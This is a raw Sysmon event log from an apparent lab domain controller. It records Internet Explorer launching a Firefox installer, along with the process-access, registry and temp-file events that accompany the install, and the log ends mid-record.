10341000x800000000000000013855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.912{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.912{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.912{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.912{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.896{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000013850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDBSetValue2021-01-18 13:59:42.896{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Users\Administrator\Downloads\Firefox Installer.exeBinary Data 10341000x800000000000000013849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.896{59A5CD1D-8E46-6005-1200-00000000A301}12124376C:\Windows\System32\svchost.exe{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.896{59A5CD1D-8E46-6005-1200-00000000A301}12124376C:\Windows\System32\svchost.exe{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.849{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.833{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.833{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.833{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.833{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.833{59A5CD1D-940F-6005-0C05-00000000A301}64766548C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\SHELL32.dll+8d42f|C:\Windows\System32\SHELL32.dll+8d2bc|C:\Windows\System32\SHELL32.dll+8d00c|C:\Windows\System32\SHELL32.dll+114fd7|C:\Windows\System32\SHELL32.dll+114f35|C:\Windows\SYSTEM32\IEFRAME.dll+2a2c5d|C:\Windows\SYSTEM32\IEFRAME.dll+22c5ec|C:\Windows\SYSTEM32\IEFRAME.dll+22af66|C:\Windows\SYSTEM32\IEFRAME.dll+1dec33|C:\Windows\SYSTEM32\IEFRAME.dll+40711d|C:\Windows\SYSTEM32\IEFRAME.dll+40702e|C:\Windows\SYSTEM32\IEFRAME.dll+3fd12f 154100x800000000000000013841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.843{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe18.05FirefoxFirefoxMozilla7zS.sfx.exe"C:\Users\Administrator\Downloads\Firefox Installer.exe" C:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=7BD92030A0CEA3D42BD54903C5CA725D,SHA256=5343F81882C3E545C30534C87281B2342F1856B408D4E56F43B8532D66FEE04B,IMPHASH=00000000000000000000000000000000{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" 10341000x800000000000000013840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.833{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\system32\explorerframe.dll+154e|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+6885|C:\Windows\SYSTEM32\IEFRAME.dll+62cf|C:\Windows\SYSTEM32\IEFRAME.dll+601d|C:\Windows\SYSTEM32\IEFRAME.dll+7dbc|C:\Windows\SYSTEM32\IEFRAME.dll+e51a1|C:\Windows\SYSTEM32\IEFRAME.dll+52c9e|C:\Windows\SYSTEM32\IEFRAME.dll+5097c|C:\Windows\SYSTEM32\IEFRAME.dll+d2e47|C:\Windows\SYSTEM32\IEFRAME.dll+d1f16|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\IEFRAME.dll+d96fc|C:\Windows\SYSTEM32\IEFRAME.dll+1196f|C:\Windows\SYSTEM32\IEFRAME.dll+129b8 10341000x800000000000000013839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.833{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\system32\explorerframe.dll+1501|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+6885|C:\Windows\SYSTEM32\IEFRAME.dll+62cf|C:\Windows\SYSTEM32\IEFRAME.dll+601d|C:\Windows\SYSTEM32\IEFRAME.dll+7dbc|C:\Windows\SYSTEM32\IEFRAME.dll+e51a1|C:\Windows\SYSTEM32\IEFRAME.dll+52c9e|C:\Windows\SYSTEM32\IEFRAME.dll+5097c|C:\Windows\SYSTEM32\IEFRAME.dll+d2e47|C:\Windows\SYSTEM32\IEFRAME.dll+d1f16|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\IEFRAME.dll+d96fc|C:\Windows\SYSTEM32\IEFRAME.dll+1196f 10341000x800000000000000013838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.833{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.833{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.833{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\system32\explorerframe.dll+1501|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+6885|C:\Windows\SYSTEM32\IEFRAME.dll+62cf|C:\Windows\SYSTEM32\IEFRAME.dll+601d|C:\Windows\SYSTEM32\IEFRAME.dll+7dbc|C:\Windows\SYSTEM32\IEFRAME.dll+e51a1|C:\Windows\SYSTEM32\IEFRAME.dll+52c9e|C:\Windows\SYSTEM32\IEFRAME.dll+5097c|C:\Windows\SYSTEM32\IEFRAME.dll+d2e47|C:\Windows\SYSTEM32\IEFRAME.dll+d1f16|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\IEFRAME.dll+d96fc|C:\Windows\SYSTEM32\IEFRAME.dll+1196f|C:\Windows\SYSTEM32\IEFRAME.dll+129b8 10341000x800000000000000013835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.724{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.724{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:43.583{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exeC:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe2021-01-18 13:59:43.583 11241100x800000000000000013906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:43.583{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exeC:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\InetBgDL.dll2021-01-18 13:59:43.583 10341000x800000000000000013905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.443{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.443{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.443{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.427{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.380{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.380{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.380{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 